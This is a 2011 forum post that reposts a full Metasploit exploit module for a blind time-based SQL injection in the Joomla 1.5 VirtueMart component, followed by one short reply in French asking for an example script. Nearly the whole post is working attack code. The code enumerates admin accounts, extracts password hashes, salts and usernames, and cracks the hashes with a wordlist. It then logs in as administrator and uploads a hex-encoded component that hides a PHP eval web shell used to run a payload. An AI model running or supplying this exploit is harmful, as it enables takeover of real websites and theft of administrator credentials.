LLegoLLaS Posted July 28, 2011 Report Share Posted July 28, 2011 # Exploit Title: Joomla 1.5 com_virtuemart <= 1.1.7 blind time-based sql injection MSF module# Date: Thu Jul 28, 2011# Author: TecR0c - tecr0c.mythsec [@] gmail.com# Version: <= 1.1.7# Download: VirtueMart - Files - VirtueMart# Greetz: mythsec team, James Bercega for code base for sqli blindrequire 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = GreatRankinginclude Msf::Exploit::Remote::HttpClientdef initialize(info = {})super(update_info(info,'Name' => 'Joomla 1.5 VirtueMart Component <= 1.1.7 Blind SQL Injection','Description' => %q{A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifiesunauthenticated time-based blind SQL injection in the "page" variable of thevirtuemart component. This vulnerability allows an attacker to gain informationfrom the database with specially crafted URLs taking advantage of the MySQLbenchmark. This issue was patched in version 1.1.7a.},'Author' =>['TecR0c', #Initial discovery, msf module'mr_me', #Initial discovery with TecR0c],'License' => MSF_LICENSE,'References' =>[[ 'URL', 'http://www.exploit-db.com/exploits/17132/' ],[ 'URL','http://www.stratsec.net/Research/Advisories/' ],],'Privileged' => false,'Platform' => 'php','Arch' => ARCH_PHP,'Targets' => [[ 'Automatic', { }]],'DisclosureDate' => 'Feb 11 2011','DefaultTarget' => 0 ))register_options([OptString.new('JDIR', [true, 'Joomla directory', '/']),OptInt.new('BMCT', [true, 'Benchmark Counter', 50000000 ]),OptInt.new('BMDF', [true, 'Benchmark Difference', 3 ]),OptInt.new('BMRC', [true, 'Benchmark Request Count', 1 ]),OptString.new('WLIST', [true,'Wordlist location','/home/foo/bar.txt']),OptString.new('AGNT', [false, 'User Agent Info', 'Mozilla/5.0' ]),OptString.new('PREF', [false, 'Database prefixt', 'jos_' ]),OptString.new('JQRY', [false,'URI to trigger bug','index.php?option=com_virtuemart&page=1'])], self.class)end################################################## Extract "Set-Cookie"def init_cookie(data, cstr = true)# Raw request? Or cookie data specifically?data = data.headers['Set-Cookie'] ? data.headers['Set-Cookie']: data# Beginningif ( data )# Break them apartdata = data.split(', ')# Initializectmp = ''tmps = {}# Parse cookiesdata.each do | x |# Remove extra datax = x.split(';')[0]# Seperate cookie pairsif ( x =~ /([^;\s]+)=([^;\s]+)/im )# Keyk = $1# Valv = $2# Valid cookie value?if ( v.length() > 0 )# Build cookie hashtmps[k] = v# Report cookie statusprint_status("Got Cookie: #{k} => #{v}");endendend# Build string dataif ( cstr == true )# Looptmps.each do |x,y|# Cookie key/valuectmp << "#{x}=#{y};"end# Assigntmps['cstr'] = ctmpend# Returnreturn tmpselse# Something may be wronginit_debug("No cookies within the given response")endend################################################## Simple debugging outputdef init_debug(resp, exit = 0)# Continue executionif ( exit.to_i > 0 )# Exitexit(0)endend################################################## Generic post wrapperdef http_post(url, data, headers = {}, timeout = 15)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Content-Typeheaders['Content-Type'] = headers['Content-Type'] ?headers['Content-Type'] : "application/x-www-form-urlencoded"# Determine Content-Lengthheaders['Content-Length'] = data.length# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null valueif ( !hval )# Delete header keyheaders.delete(hkey)endend# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'method' => 'POST','data' => data,'headers' => headers},timeout )# Returnedreturn respend################################################## Generic post multipart wrapperdef http_post_multipart(url, data, headers = {}, timeout = 15)# Boundary stringbndr = Rex::Text.rand_text_alphanumeric(8)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Content-Typeheaders['Content-Type'] = headers['Content-Type'] ?headers['Content-Type'] : "multipart/form-data; boundary=#{bndr}"# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null valueif ( !hval )# Delete header keyheaders.delete(hkey)endend# Inittemp = ''# Parse form valuesdata.each do |name, value|# Hash means file dataif ( value.is_a?(Hash) )# Validate form fieldsfilename = value['filename'] ? value['filename']:init_debug("Filename value missing from #{name}", 1)contents = value['contents'] ? value['contents']:init_debug("Contents value missing from #{name}", 1)mimetype = value['mimetype'] ? value['mimetype']:init_debug("Mimetype value missing from #{name}", 1)encoding = value['encoding'] ? value['encoding']: "Binary"# Build multipart datatemp << "--#{bndr}\r\n"temp << "Content-Disposition: form-data; name=\"#{name}\"; filename=\"#{filename}\"\r\n"temp << "Content-Type: #{mimetype}\r\n"temp << "Content-Transfer-Encoding: #{encoding}\r\n"temp << "\r\n"temp << "#{contents}\r\n"else# Build multipart datatemp << "--#{bndr}\r\n"temp << "Content-Disposition: form-data; name=\"#{name}\";\r\n"temp << "\r\n"temp << "#{value}\r\n"endend# Complete the form datatemp << "--#{bndr}--\r\n"# Assigneddata = temp# Determine Content-Lengthheaders['Content-Length'] = data.length# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'method' => 'POST','data' => data,'headers' => headers},timeout)# Returnedreturn respend################################################## Generic get wrapperdef http_get(url, headers = {}, timeout = 15)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null value // Also, remove post specific data, due to a bug ...if ( !hval || hkey == "Content-Type" || hkey == "Content-Length" )# Delete header keyheaders.delete(hkey)endend# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'headers' => headers,'method' => 'GET',}, timeout)# Returnedreturn respend################################################## Used to perform benchmark querysdef sql_benchmark(test, hdrs, table = nil, where = '1+LIMIT+1', tnum = nil )# Initwait = 0# Defaultstable = table ? table: 'users'# SQL Injection string used to trigger the MySQL BECNHMARK() functionsqli = ("'+UNION+SELECT+IF(#{test},+BENCHMARK(#{datastore['BMCT']},\+MD5(1)),+0)+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}--+sqli.page")# Number of tests to run. We run this# amount of tests and then look for a# median value that is greater than# the benchmark difference.tnum = tnum ? tnum: datastore['BMRC']# Run the teststnum.to_i.times do | i |# Start timebmc1 = Time.now.to_i# Make the requestinit_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))# End timebmc2 = Time.now.to_i# Total timewait += bmc2 - bmc1end# Return the resultsreturn ( wait.to_i / tnum.to_i )end################################################## Used to perform benchmark querysdef sql_benchmark_2(hdrs, columns = nil, table = nil, where = '1+LIMIT+1', tnum = nil )# Initwait = 0# Defaultstable = table ? table: 'users'# SQL Injection string used to trigger the MySQL BECNHMARK() functionsqli = ("'+UNION+SELECT+IF(substring((select+#{columns}+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}),1,1),BENCHMARK(#{datastore['BMCT']},+MD5(1)),+0)--+sqli.page")# Number of tests to run. We run this# amount of tests and then look for a# median value that is greater than# the benchmark difference.tnum = tnum ? tnum: datastore['BMRC']# Run the teststnum.to_i.times do | i |# Start timebmc1 = Time.now.to_i# Make the requestinit_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))# End timebmc2 = Time.now.to_i# Total timewait += bmc2 - bmc1end# Return the resultsreturn ( wait.to_i / tnum.to_i )end#################################################def get_password(hash, salt, opts = nil)# Wordlistwlst = datastore['WLIST']# Initcntr = 0# Verboseprint_status("Attempting to crack admin password hash")# Valid hash length onlyif ( hash.length != 32 )# Failureprint_error("Invalid Joomla MD5 hash: #{hash.to_s}")return nilend# Does the wordlist exist?if ( !File.exist?(wlst) )# Failureprint_error("Unable to load wordlist: #{wlst}")return nilelse# Load the wordlist filelist = File.readlines(wlst)end# Verboseprint_status("Loaded #{list.count.to_s} words from the specified list")print_status("This may take quite some time ...")# Start timebmc1 = Time.now.to_i# Loop through listlist.each do | word |# Cleanupword = word.strip# Countercntr = cntr + 1# Attempt to find the plaintext passwordif ( hash == Rex::Text.md5(word + salt) )# Success!print_status("Successfully cracked the following hash")print_status("#{hash} => #{salt} == #{word}")# Ended timebmc2 = Time.now.to_i# Durationbmc3 = bmc2 - bmc1bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes"# Verboseprint_status("Operation completed in #{bmc3}")# Returnreturn wordend # ifend # each# Failureprint_error("Unable to crack the following hash")print_error("#{hash} => #{salt} == ???")# Ended timebmc2 = Time.now.to_i# Durationbmc3 = bmc2 - bmc1bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes"# Verboseprint_status("Operation completed in #{bmc3}")# Returnreturn nilend#################################################def get_users_data(hdrs, snum, slim, cset, sqlf, sqlw)# Start timetot1 = Time.now.to_i# Initializereqc = 0retn = String.new# Extract saltfor i in snum..slim# Offset positionoset = ( i - snum ) + 1# Loop charsetfor cbit in cset# Test charactercbit.each do | cchr |# Start time (overall)bmc1 = Time.now.to_i# Benchmark querybmcv = sql_benchmark("SUBSTRING(#{sqlf},#{i},1)+LIKE+BINARY+CHAR(#{cchr.ord})",hdrs,"users", sqlw, datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Verboseprint_status(sprintf("Character %02s is %s", oset.to_s, cchr ))# Append chrretn << cchr# Exit loopbreakend# Counterreqc += 1end # eachend # for# Host not vulnerable?if ( oset != retn.length )# Failureprint_error("Unable to extract character ##{oset.to_s}\. Extraction failed!")return nilendend # for# End time (total)tot2 = Time.now.to_i# Benchmark totalstot3 = tot2 - tot1# Verboseprint_status("Found data: #{retn}")print_status("Operation required #{reqc.to_s} requests (#{( tot3 / 60).to_s} minutes)")# Returnreturn retnend#################################################def checkprint_status("Attempting to determine virtuemart version")resp = http_get("modules/mod_virtuemart_currencies/mod_virtuemart_currencies.xml")# Extract Joomla version informationif ( resp.body =~ /<version>([^\s]+)<\/version>/ )# Versionvers = $1.strip# Version "parts"ver1, ver2, ver3 = vers.split(/\./)# Only if version 1.1.7if ( ver3.to_i >= 7)# Exploit failedinit_debug(resp)print_status("Please confirm manually")return Exploit::CheckCode::Safeelseprint_status("The target is running VirtueMart : #{vers}")return Exploit::CheckCode::Vulnerableendelse# Verboseprint_error("Unable to determine Joomla version ...")endend#################################################def exploit# Numeric test stringtstr = Time.now.to_i.to_s# MD5 test stringtmd5 = Rex::Text.md5(tstr)# Encoded payloadload = payload.encoded################################################## STEP 02 // Get the cookie for virtuemart ################################################## request to get virtuemart cookieresp = http_get("index.php?option=com_virtuemart&page=1")# Init cookiecook = init_cookie(resp)# Build headers for authenticated sessionhdrs = { "Cookie" => cook['cstr'] }################################################## STEP 03 // Calculate BENCHMARK() response times################################################## Verboseprint_status("Calculating target response times")print_status("Benchmarking #{datastore['BMRC']} normal requests")# Normal request median (globally accessible)datastore['BMC0'] = sql_benchmark("1=2", hdrs)# Verboseprint_status("Normal request avg: #{datastore['BMC0'].to_s} seconds")print_status("Benchmarking #{datastore['BMRC']} delayed requests")# Delayed request medianbmc1 = sql_benchmark("1=1", hdrs)# Verboseprint_status("Delayed request avg: #{bmc1.to_s} seconds")# Benchmark totalsbmct = bmc1 - datastore['BMC0']# Delay too small. The host may not be# vulnerable. Try increasing the BMCT.if ( bmct.to_i < datastore['BMDF'].to_i )# Verboseprint_error("your benchmark threshold is small, or host is not vulnerable")print_error("increase the benchmark threshold adjust the value of the BMDF")print_error("increase the expression iterator adjust the value of the BMCT")returnelse# Host appears exploitableprint_status("Request Difference: #{bmct.to_s} seconds")end################################################## STEP 04 // Attempting to find a valid admin id#################################################atot = 0 # Total adminsscnt = 0 # Step counterstep = 10 # Step incrementslim = 10000 # Step limit# 42 is the hard coded base uid within Joomla ...# ... and the answer to the ultimate question! ;]snum = ( !defined?(auid) ) ? 62: auid # changed from 42 to 62# Verboseprint_status("Calculating total number of administrators")# Check how many admin accounts are in the databasefor i in 0..slim do# Benchmarkbmcv = sql_benchmark_2(hdrs, "gid", "users", "gid=25+LIMIT+#{i.to_s},1",datastore['BMRC'])# If we do not have a delay, then we have reached the end ...if ( !( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) )# Rangeatot = i# Verboseprint_status("Successfully confirmed #{atot.to_s} admin accounts")# Exit loopbreakendend# Loops until limitwhile ( snum < slim && scnt < atot )# Verboseprint_status("Attempting to find a valid admin ID")# Verboseprint_status("Stepping from #{snum.to_s} to #{slim.to_s} by #{step.to_s}")for i in snum.step(slim, step)bmcv = 0# Benchmarkbmcv = sql_benchmark("#{i}+>+id", hdrs, "users","gid=25+LIMIT+#{scnt.to_s},1", datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Rangeitmp = i# Exit loopbreakelse# Out of time ..if ( i == slim )# Failureprint_error("Unable to find a valid user id. Exploit failed!")returnendendend# Jump back by #{step} and increment by onefor i in ( snum ).upto(( itmp ))bmcv = 0auid = 0# Benchmarkbmcv = sql_benchmark("id+=+#{i}", hdrs, "users", "gid=25",datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# UserID - first time auid gets set to 62auid = i# Verboseprint_status("Found a valid admin account uid : #{auid.to_s}")# Step Counterscnt += 1# Exit loopbreakelse# Out of time ..if ( i == ( itmp + step ) )# Failureprint_error("Unable to find a valid user id. Exploit failed!")returnendendend################################################## These are the charsets used for the enumeration# operations and can be easily expanded if needed################################################## Hash charset a-f0-9hdic = [ ('a'..'f'), ('0'..'9') ]# Salt charset a-zA-Z0-9sdic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]# Username charsetudic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]################################################## STEP 05 // Attempt to extract admin pass hash################################################## Verboseprint_status("Attempting to gather admin password hash")# Get pass hash - changed bsif ( auid != 0 && !( hash = get_users_data(hdrs, # Pass cookie value1, # Length Start32, # Length Maximumhdic, # Charset Array"password", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin pass hash. Exploit failed!!")returnend################################################## STEP 06 // Attempt to extract admin pass salt################################################## Verboseprint_status("Attempting to gather admin password salt")# Get pass salt - changed bsif ( auid != 0 && !( salt = get_users_data(hdrs, # Pass cookie value34, # Length Start65, # Length Maximumsdic, # Charset Array"password", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin pass salt. Exploit failed!!")returnend################################################## STEP 07 // Attempt to crack the extracted hash################################################## Attempt to crack password hash - changed bsif ( auid != 0 )pass = get_password(hash, salt)end# Got pass? - changed bsif ( auid != 0 && pass )################################################## STEP 08 // Attempt to extract admin username################################################## Verboseprint_status("Attempting to determine target username length")# Hard limit is 150for i in 1.upto(150)# Benchmarkbmcv = sql_benchmark("LENGTH(username)=#{i.to_s}", hdrs,"users", "id=#{auid.to_s}", datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Lengthulen = i# Verboseprint_status("The username is #{i.to_s} characters long")# Exit loopbreakendend# Verboseprint_status('Gathering admin username')# Get pass saltif ( !( user = get_users_data(hdrs, # Pass cookie value1, # Length Startulen, # Length Maximumudic, # Charset Array"username", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin user name. Exploit failed!!")returnend# Verboseprint_status("Attempting to extract a valid request token")# Request a valid tokenresp = http_get("administrator/index.php")# Extract tokenif ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )# Tokenrtok = $1# Verboseprint_status("Got token: #{rtok}")else# Failureprint_error("Unable to extract request token. Exploit failed!")init_debug(resp)returnend# Init cookiecook = init_cookie(resp)# Build headers for authenticated sessionhdrs = { "Cookie" => cook['cstr'] }################################################## STEP 09 // Attempt to authenticate as the admin################################################## Verboseprint_status("Attempting to login as: #{user}")# Post data for login requestpost = "username=#{user}&passwd=#{pass}\?=&option=com_login&task=login{rtok}=1"# Login requestresp = http_post("administrator/index.php", post, hdrs)# Authentication successful???if ( resp && resp.code == 303 )# Successprint_status("Successfully logged in as: #{user}")else# Failureprint_error("Unable to authenticate. Exploit failed!")init_debug(resp)returnend################################################## STEP 10 // Upload wrapper and execute payload!################################################## Verboseprint_status("Attempting to extract refreshed request token")# Request a valid token (again)resp = http_get("administrator/index.php?option=com_installer",hdrs)# Extract tokenif ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )# Tokenrtok = $1# Verboseprint_status("Got token: #{rtok}")else# Failureprint_error("Unable to extract request token. Exploit failed!")init_debug(resp.body)returnend# Component specific datacstr = "joomla"czip = "com_#{cstr}.zip"curi = "components/com_#{cstr}/#{cstr}.php"################################################## Our Joomla specific PHP payload wrapper that is# used to have more flexibility when delivering a# selected payload to a target. The wrapper is in# the Joomla! 1.6 compononent format and can also# be used with other Joomla exploits.################################################### Type: Joomla 1.6 Component# File: com_joomla/joomla.xml <-- installer file# com_joomla/joomla.php <-- component file## Data: <?php# # Modify settings# error_reporting(0);# ini_set('max_execution_time', 0);## # Execute the selected payload, and delete the wrapper# @eval(base64_decode(file_get_contents('php://input')));# ?>################################################## Hex encoded component zip datawrap = "\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\x65\xB3\x9A\x3E\x00\x00"wrap << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x63\x6F"wrap << "\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B\x03\x04\x0A\x00\x00"wrap << "\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03\xF2\xF9\xAF\x00\x00\x00\xAF"wrap << "\x00\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C"wrap << "\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68\x70\x3C\x3F\x70\x68"wrap << "\x70\x0D\x0A\x23\x20\x4D\x6F\x64\x69\x66\x79\x20\x73\x65\x74\x74"wrap << "\x69\x6E\x67\x73\x0D\x0A\x65\x72\x72\x6F\x72\x5F\x72\x65\x70\x6F"wrap << "\x72\x74\x69\x6E\x67\x28\x30\x29\x3B\x0D\x0A\x69\x6E\x69\x5F\x73"wrap << "\x65\x74\x28\x27\x6D\x61\x78\x5F\x65\x78\x65\x63\x75\x74\x69\x6F"wrap << "\x6E\x5F\x74\x69\x6D\x65\x27\x2C\x20\x30\x29\x3B\x0D\x0A\x0D\x0A"wrap << "\x23\x20\x45\x78\x65\x63\x75\x74\x65\x20\x74\x68\x65\x20\x73\x65"wrap << "\x6C\x65\x63\x74\x65\x64\x20\x70\x61\x79\x6C\x6F\x61\x64\x0D\x0A"wrap << "\x40\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63"wrap << "\x6F\x64\x65\x28\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E"wrap << "\x74\x65\x6E\x74\x73\x28\x27\x70\x68\x70\x3A\x2F\x2F\x69\x6E\x70"wrap << "\x75\x74\x27\x29\x29\x29\x3B\x0D\x0A\x3F\x3E\x50\x4B\x03\x04\x0A"wrap << "\x00\x00\x00\x00\x00\x91\xB6\x9A\x3E\x8D\x4A\x99\xA9\x07\x01\x00"wrap << "\x00\x07\x01\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F"wrap << "\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x78\x6D\x6C\x3C\x3F"wrap << "\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30"wrap << "\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D"wrap << "\x38\x22\x3F\x3E\x0D\x0A\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E"wrap << "\x20\x74\x79\x70\x65\x3D\x22\x63\x6F\x6D\x70\x6F\x6E\x65\x6E\x74"wrap << "\x22\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x36\x2E\x30"wrap << "\x22\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6E\x61"wrap << "\x6D\x65\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6E\x61\x6D\x65\x3E"wrap << "\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x69\x6C\x65\x73"wrap << "\x20\x66\x6F\x6C\x64\x65\x72\x3D\x22\x73\x69\x74\x65\x22\x3E\x3C"wrap << "\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x6A\x6F\x6F\x6D\x6C\x61\x2E"wrap << "\x70\x68\x70\x3C\x2F\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x3C\x2F"wrap << "\x66\x69\x6C\x65\x73\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20"wrap << "\x20\x3C\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x69\x6F\x6E"wrap << "\x3E\x3C\x6D\x65\x6E\x75\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6D"wrap << "\x65\x6E\x75\x3E\x3C\x2F\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61"wrap << "\x74\x69\x6F\x6E\x3E\x0D\x0A\x3C\x2F\x65\x78\x74\x65\x6E\x73\x69"wrap << "\x6F\x6E\x3E\x0D\x0A\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00"wrap << "\x00\x65\xB3\x9A\x3E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"wrap << "\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"wrap << "\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B"wrap << "\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03"wrap << "\xF2\xF9\xAF\x00\x00\x00\xAF\x00\x00\x00\x15\x00\x00\x00\x00\x00"wrap << "\x00\x00\x00\x00\x20\x00\x00\x00\x29\x00\x00\x00\x63\x6F\x6D\x5F"wrap << "\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68"wrap << "\x70\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x91\xB6\x9A"wrap << "\x3E\x8D\x4A\x99\xA9\x07\x01\x00\x00\x07\x01\x00\x00\x15\x00\x00"wrap << "\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x0B\x01\x00\x00\x63"wrap << "\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61"wrap << "\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00"wrap << "\xBF\x00\x00\x00\x45\x02\x00\x00\x00\x00"# Verboseprint_status("Attempting to upload payload wrapper component")# Post datadata = {# Component data'install_package' =>{'filename' => czip,'contents' => wrap,'mimetype' => 'application/zip','encoding' => 'binary',},# Required install params"installtype" => "upload","task" => "install.install","#{rtok}" => "1",}# Upload the wrapper componentinit_debug(http_post_multipart("administrator/index.php?option=\com_installer&view=install", data, hdrs))# Deliver the selected payload to the targetinit_debug(http_post(curi, Rex::Text.encode_base64(load)))# Shellhandlerreturnelse# Verboseprint_error("Failed to crack hash. Searching for new admin account ...")end # ifsnum += 1end # while# Verboseprint_error("Unable to crack any admin hashes. Try a better wordlist?")returnendendsursa: Joomla 1.5 com_virtuemart <= 1.1.7 Blind time-based SQL Injection (MSF) - BugSearch.net Quote Link to comment Share on other sites More sharing options...
==LILO== Posted July 28, 2011 Report Share Posted July 28, 2011 Pouvez-vous donner un exemple de script Quote Link to comment Share on other sites More sharing options...